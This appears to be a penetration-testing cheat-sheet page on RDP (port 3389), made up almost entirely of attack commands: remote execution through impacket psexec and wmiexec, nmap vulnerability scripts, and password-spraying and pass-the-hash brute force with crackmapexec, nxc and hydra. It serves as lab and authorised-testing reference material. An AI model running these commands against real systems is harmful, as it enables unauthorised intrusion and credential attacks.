TCP: RDP - 3389

Connection to Target Machine

FreeRDP3

xfreerdp3 /u:'<Username>' /d:'<Domain Name>' /p:'<Password>' /v:<Target IP Address> /dynamic-resolution +clipboard /drive:/home/kali/offsec/downloads,/shared

Impacket

impacket-psexec '<Domain Name>'/'<Username>':'<Password>'@<Target IP Address>

impacket-wmiexec <Domain Name>/<Username>:<Password>@<Target IP Address>

Enumeration

Nmap

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <Target IP Address>

Bruteforce

crackmapexec

crackmapexec rdp <Target IP Address> -u <Username List> -H <Hashes List> --continue-on-success

crackmapexec rdp <Target IP Address> -u <Username List> -P <Password List> --continue-on-success

nxc

nxc rdp <Target IP Address> -d <Domain Name> -u <Username List> -p <Password List> --continue-on-success

nxc rdp <Target IP Address> -d <Domain Name> -u <Username List> -H <Hashes List> --continue-on-success

hydra

hydra -L <Username List> -p <Password List> <Target IP Address> rdp

PreviousTCP: SMTP - 25 NextTCP: RPC - 135 / 593

Last updated 2 months ago